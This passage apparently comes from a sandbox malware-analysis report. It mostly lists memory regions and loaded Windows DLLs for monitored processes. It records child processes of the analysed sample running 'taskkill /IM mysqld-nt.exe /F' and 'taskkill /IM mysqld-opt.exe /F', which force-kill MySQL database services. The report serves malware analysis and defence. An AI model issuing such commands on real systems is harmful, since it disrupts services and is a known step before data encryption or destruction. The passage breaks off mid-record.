= private name = "private_0x000000007f0e0000" filename = "" Region: id = 1629 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1630 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1631 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1632 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1633 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1634 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1635 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1636 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1637 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1638 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1639 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1640 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1641 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1642 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1643 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1644 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1645 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1646 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1647 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1648 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1649 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1650 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1651 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1652 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1653 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1654 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1655 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1656 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1657 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1658 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1659 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1660 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1661 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1662 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1663 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1664 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1665 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 124 os_tid = 0xbf0 Thread: id = 149 os_tid = 0x780 Thread: id = 152 os_tid = 0x360 Thread: id = 157 os_tid = 0x274 Thread: id = 158 os_tid = 0x324 Process: id = "18" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x1d5f9000" os_pid = "0x6d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM mysqld-nt.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1359 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1360 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1361 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1362 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1363 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1364 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1365 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1366 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 1367 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1368 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1369 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1370 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1371 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1372 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1373 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1818 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1819 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1820 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1821 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1822 start_va = 0x70000 end_va = 0x73fff entry_point = 0x70000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1823 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1824 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1825 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 1826 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1827 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1828 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1829 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1830 start_va = 0x440000 end_va = 0x5c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1831 start_va = 0x5d0000 end_va = 0x750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 1832 start_va = 0x760000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 1833 start_va = 0x1b90000 end_va = 0x1c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 1834 start_va = 0x1c10000 end_va = 0x1ccffff entry_point = 0x1c10000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1835 start_va = 0x1cd0000 end_va = 0x1d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 1836 start_va = 0x1e00000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 1837 start_va = 0x1f00000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 1838 start_va = 0x2030000 end_va = 0x20affff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 1839 start_va = 0x20b0000 end_va = 0x237efff entry_point = 0x20b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1840 start_va = 0x2380000 end_va = 0x23fffff entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 1841 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1842 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1843 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1844 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1845 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1846 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1847 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1848 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1849 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1850 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1851 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1852 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1853 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1854 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1855 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1856 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1857 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1858 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1859 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1860 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1861 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1862 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1863 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1864 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1865 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1866 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1867 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1868 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1869 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1870 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1871 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1872 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1873 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1874 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1875 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1876 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1877 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1878 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1879 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1880 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 133 os_tid = 0x638 Thread: id = 154 os_tid = 0x24c Thread: id = 171 os_tid = 0x2b4 Thread: id = 173 os_tid = 0xb0 Thread: id = 174 os_tid = 0x8b0 Process: id = "19" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x161e000" os_pid = "0x314" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM mysqld-opt.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1437 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1438 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1439 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1440 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1441 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1442 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1443 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1444 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 1445 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1446 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1447 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1448 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1449 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1450 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1451 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1769 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1770 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1771 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1772 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1773 start_va = 0xd0000 end_va = 0xd1fff entry_point = 